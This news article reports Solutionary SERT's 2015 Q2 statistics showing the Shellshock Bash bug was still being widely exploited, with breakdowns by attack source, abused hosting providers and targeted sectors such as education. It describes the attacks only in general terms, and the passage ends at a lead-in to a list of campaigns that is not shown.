Shellshock, the Bash bug heralded as the next Heartbleed is still being successfully exploited by attackers, 10 months after it has been revealed to the world.
Discovered in late September 2014, the bug has gone through a series of patches, but as the Solutionary Security Engineering Research Team (SERT) points out in its 2015 Q2 report, Shellshock is alive and well and is still being used even now.
SERT identified over 600,000 Shellshock-related events in the last 3 months, spread across 25,000 unique IP addresses and originating from 2,027 various service providers, businesses, and industries.
Attackers checked for Shellshock vulnerability before executing the payload
Profiling the attacks, Solutionary’s SERT team, has observed that “nearly 60% of identified Shellshock traffic was designed to determine if the hosts were vulnerable.”
If this yielded positive results, attackers would then download and execute bash shell scripts, exposing the underlying servers to their needs.
Besides shell scripts, SERT also identified that attack payloads were also delivered via .c.txt files, ELF binaries, Perl and PHP scripts.
Nearly half of attacks originated from the US
The sources of the attacks are mainly located in the US, UK, China, South Korea, Germany, and Japan.
This shouldn’t surprise anyone since these countries are also where classic and cloud-based hosting services are located most of the times.
Since hosting servers run on POSIX systems and are vulnerable, it was no surprise to the SERT team to discover that most attacks are carried out via ISPs, with GoDaddy and Korea Telecom being the two most abused.
As for the targets of the Shellshock attacks, the education sector had it the worst with 38% of all detected events, followed by technology (17%), healthcare (6%), finances (5%), and manufacturing (5%).
Besides one-off attacks, Solutionary also observed more organized operations, Shellshock campaigns carried out by well-organized groups that paid special attention at covering their tracks. The most important are listed below: